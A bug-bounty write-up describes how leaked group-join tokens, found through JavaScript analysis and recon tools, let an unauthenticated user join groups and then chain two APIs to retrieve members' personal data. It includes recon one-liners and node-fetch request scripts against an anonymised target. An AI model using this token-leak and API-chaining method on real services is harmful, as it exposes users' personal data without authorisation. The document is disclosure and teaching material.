Some Token Leak Can Lead to Disclose a Lot of Users’ Personal Data
PII leak
In this post, I want to share you how important to read JavaScript and recon about target. JavaScript can contain important resources like DB info, credentials, hidden parameter, hidden API,…..etc. Also, recon can give you understanding the target and some hidden point in the application. So, I got a hidden point with wide recon and I escalated to ‘High’ severity with JavaScript.
I changed specific data about API and used a comprehensive words because it must be kept secret for the security of the target. I ask for your understanding.
As usually, I was analyzing JavaScript manually. When I was analyzing some API logic in JavaScript, I found the target use specific token for application function.
cat host.txt | waybackurls | tee -a all_endpoint.txt
cat host.txt | waymore | tee -a all_endpoint.txt
katana -u target.com -passive -f qurl >> target_endpoint.txt
arjun -u https://target.com >> target_endpoint.txtFor understanding the token, I searched directories and API with Recon tools. Fortunately, I found some directories including the specific tokens. I accessed the endpoint quickly and redirected to page that can register users to some group.
After further interacting with the the function, I understood that the token is matching with each group. So, user can join the group with no authentication only using the URL including specific tokens. In other words, all users without authentication can join the group matching the specific token. So, the tokens should not be open to the public.
I thought this is insufficient risk impact for approving. What attacker can do after join the group? So, I decided to escalate the severity.
I started to find and analyze API using the specific token in the JavaScript. When I was reading JavaScript, I found /v1/token-function/group/{specific-number}/user API using specific number of group. With this API, attacker can get a lot of users’ personal data of the group.
require('core-js/stable');
require('regenerator-runtime/runtime');
const fetch = require('node-fetch');
const url = 'https://target.com/api/v1/token-function/group/{specific-number}/user';
const postData = {
data:"{search}"
};
const headers = {
'Content-Type': 'application/json',
'Authorization': '{JWT token}'
};
fetch(url, {
method: 'GET',
headers: headers,
body: JSON.stringify(postData)
})
.then(response => {
if (!response.ok) {
throw new Error('error');
}
return response.json();
})
.then(data => {
console.log(data);
})
.catch(error => {
console.error('fetch error:', error);
});For using the API, attacker should get two things.
[1] Attacker should join in the group. Because the API use ‘Authorization’ header that check whether the user belongs to the group. In here, attacker can join the group with the specific token easily.
[2] Attacker should know the specific number representing the group. But, in here, I couldn’t know the number because I joined the group directly with token.
So, I searched API history with Burp-Suite to get the specific number of the group and found /v1/users API.
require('core-js/stable');
require('regenerator-runtime/runtime');
const fetch = require('node-fetch');
const url = 'https://target.com/api/v1/users';
const headers = {
'Authorization': '{JWT token}'
};
fetch(url, {
method: 'GET',
headers: headers,
})With this API, user can know their own data including group data that the user joined. In here, I could find the specific number of the group in response body data.
Finally, using the specific number representing the group, attacker can get all users’ data in the group with /v1/token-function/group/{specific-number}/user API. In other word, attacker can get all users’ data in the group user joined with the leaked tokens.
It is triaged as CVSS 7.5 and accepted.
Happy Hacking :)
